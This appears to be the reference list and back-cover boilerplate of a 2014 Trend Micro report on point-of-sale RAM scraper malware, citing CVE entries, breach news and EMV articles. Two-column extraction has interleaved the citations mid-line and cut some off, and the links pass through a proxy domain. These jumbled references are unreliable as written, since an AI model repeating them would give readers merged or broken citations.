Threats, and Solutions. August 19, 2014, http://www-01.ibm.com/
88
Trend Micro | PoS RAM Scraper Malware
89
Trend Micro | PoS RAM Scraper Malware
39. Trend Micro Incorporated. (2014). Threat 47. Privacy Rights Clearinghouse. (2014). Last
Encyclopedia. “TSPY_FYSNA.A.” Last accessed August 20, 2014, https://www.
accessed August 20, 2014, http://about- privacyrights.org/.
threats.trendmicro.com/us/malware/TSPY_
FYSNA.A. 48. Wikimedia Foundation, Inc. (August 9,
2014). Wikipedia. “Air Gap (Networking).”
40. Pierluigi Paganini. (January 20, 2014). Last accessed August 20, 2014, http://
Security Affairs. “IntelCrawler Update— en.wikipedia.org/wiki/Air_gap_(networking).
BlackPOS Author Forgot Delete Social
Network Page.” Last accessed August 49. NIST. (2014). National Vulnerability
20, 2014, http://securityaffairs.co/ Database. “Vulnerability Summary for CVE-
wordpress/21441/cyber-crime/intelcrawler- 2010-1033.” Last accessed August 21,
blackpos-author-forgot-delete-social-network- 2014, http://web.nvd.nist.gov/view/vuln/
90
Trend Micro | PoS RAM Scraper Malware
53. NIST. (2014). National Vulnerability 61. Jaikumar Vijayan. (March 29, 2007).
Database. “Vulnerability Summary for CVE- Computerworld. “TJX Data Breach: At 45.6M
2008-4841.” Last accessed August 21, Card Numbers, It’s the Biggest Ever.” Last
2014, http://web.nvd.nist.gov/view/vuln/ accessed August 26, 2014, http://www.
detail?vulnId=CVE-2008-4841. computerworld.com/s/article/9014782/TJX_
data_breach_At_45.6M_card_numbers_it_s_
54. Trend Micro Incorporated. (2014). Threat the_biggest_ever.
Encyclopedia. “Adobe TIFF File Vulnerability.”
Last accessed August 21, 2014, http://about- 62. Brian Krebs. (July 25, 2013). Krebs on
threats.trendmicro.com/us/vulnerability/722/ Security. “Hacker Ring Stole 160 Million
adobe%20tiff%20file%20vulnerability. Credit Cards.” Last accessed August 26,
2014, http://krebsonsecurity.com/2013/07/
55. NIST. (2014). National Vulnerability hacker-ring-stole-160-million-credit-cards/.
Database. “Vulnerability Summary for CVE-
2010-2883.” Last accessed August 21, 63. Tom Gara. (February 6, 2014). The Wall
2014, http://web.nvd.nist.gov/view/vuln/ Street Journal. “October 2015: The End of the
detail?vulnId=CVE-2010-2883. Swipe-and-Sign Credit Card.” Last accessed
August 21, 2014, http://blogs.wsj.com/
56. NIST. (2014). National Vulnerability Database. corporate-intelligence/2014/02/06/october-
“Search CVE and CCE Vulnerability 2015-the-end-of-the-swipe-and-sign-credit-
Database.” Last accessed August 21, 2014, card/.
http://web.nvd.nist.gov/view/vuln/search.
64. Bob Russo. (March 4, 2014). “Statement
57. Trend Micro Incorporated. (2014). Threat for the Record: Can Technology
Encyclopedia. “Lateral Movement: How Protect Americans from International
Do Threat Actors Move Deeper into Your Cybercriminals?” Last accessed August
Network?” Last accessed August 21, 2014, 21, 2014, http://science.house.gov/sites/
http://about-threats.trendmicro.com/cloud- republicans.science.house.gov/files/
content/us/ent-primers/pdf/tlp_lateral_ documents/HHRG-113-SY21-WState-
movement.pdf. BRusso-20140306.pdf.
58. Ground Labs. (January 2014). Cardholder 65. Lysa Myers. (April 3, 2014). WeLiveSecurity.
Data Discovery Blog. “Unauthorised Copies “What Is EMV, and Why Is It Such a Hot
91
Trend Micro | PoS RAM Scraper Malware
92
Trend Micro Incorporated, a global leader in security software, strives to make the
world safe for exchanging digital information. Our innovative solutions for consumers,
businesses and governments provide layered content security to protect information
on mobile devices, endpoints, gateways, servers and the cloud. All of our solutions are
powered by cloud-based global threat intelligence, the Trend Micro™ Smart Protection
Network™, and are supported by over 1,200 threat experts around the globe. For more
information, visit www.trendmicro.com.
©2014 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend 225 E. John Carpenter Freeway, Suite 1500
Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. Irving, Texas 75062 U.S.A.
All other product or company names may be trademarks or registered trademarks of
their owners. Phone: +1.817.569,8900